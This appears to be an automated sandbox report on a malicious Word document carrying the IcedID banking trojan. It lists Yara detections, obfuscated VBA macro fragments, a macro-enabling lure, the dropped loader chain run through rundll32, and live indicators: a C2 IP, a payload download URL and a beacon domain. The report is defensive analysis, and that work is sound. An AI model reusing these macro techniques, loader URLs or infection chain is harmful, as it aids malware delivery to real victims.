    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: rundll32.exe, 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146
    Source: r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_c
    Source: rundll32.exe, 00000005.00000002.944141742.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n
    Source: r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Zf
    Source: rundll32.exe, 00000005.00000002.944123295.0000000000394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7180F76F-1528-4360-9534-25B0235971A3}.tmpJump to behavior
    Source: unknownDNS traffic detected: queries for: alexbionka.com
    Source: global trafficHTTP traffic detected: GET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com

    E-Banking Fraud

    barindex
    Yara detected IcedID
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 12Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". wa ii: ^ 'rri Mp -
    Source: Screenshot number: 12Screenshot OCR: Enable content". wa ii: ^ 'rri Mp - m~ O 100% G) A GE)
    Submitted sample is a known malware sample
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 Family: APT29 Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 Description: APT29 has operated since at least 2008 and attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated, and organized cyber-espionage group to collect intelligence in support of foreign and security policy decision-making. References: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdfhttps://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdfhttps://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.htmlData Source: https://github.com/RedDrip7/APT_Digital_Weapon
    Office process drops PE file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Document contains an embedded VBA macro with suspicious strings
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800024FC5_2_00000001800024FC
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Private Sub Document_Open()
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Private Sub Document_Open()
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761A33 NtOpenProcessToken,NtClose,4_2_00761A33
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess,4_2_00761203
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007619E3 NtOpenProcessToken,NtSetInformationToken,NtClose,4_2_007619E3
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,4_2_00761A8C
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7535FE6 NtCreateSection,NtMapViewOfSection,5_2_000007FEF7535FE6
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7535FF9 NtCreateSection,5_2_000007FEF7535FF9
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drStatic PE information: No import functions for PE file found
    Source: y875E.tmp.dll.1.drStatic PE information: No import functions for PE file found
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: courtesyautomotivedoc08.11.docOLE indicator, VBA macros: true
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE indicator, VBA macros: true
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: courtesyautomotivedoc08.11.docVirustotal: Detection: 26%
    Source: courtesyautomotivedoc08.11.docReversingLabs: Detection: 17%
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1Jump to behavior
    Source: courtesyautomotivedoc08.11.LNK.1.drLNK file: ..\..\..\..\..\Desktop\courtesyautomotivedoc08.11.doc
    Source: courtesyautomotivedoc08.11.docOLE indicator, Word Document stream: true
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$urtesyautomotivedoc08.11.docJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6D91.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@5/14@2/2
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007614BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW,4_2_007614BD
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCommand line argument: RunDLL4_2_00761203
    Source: courtesyautomotivedoc08.11.docOLE document summary: title field not present or empty
    Source: courtesyautomotivedoc08.11.docOLE document summary: author field not present or empty
    Source: courtesyautomotivedoc08.11.docOLE document summary: edited time not present or 0
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: title field not present or empty
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: author field not present or empty
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: edited time not present or 0
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: title field not present or empty
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: author field not present or empty
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: edited time not present or 0
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: courtesyautomotivedoc08.11.docInitial sample: OLE zip file path = docProps/custom.xml
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: courtesyautomotivedoc08.11.docStatic file information: File size 2351271 > 1048576
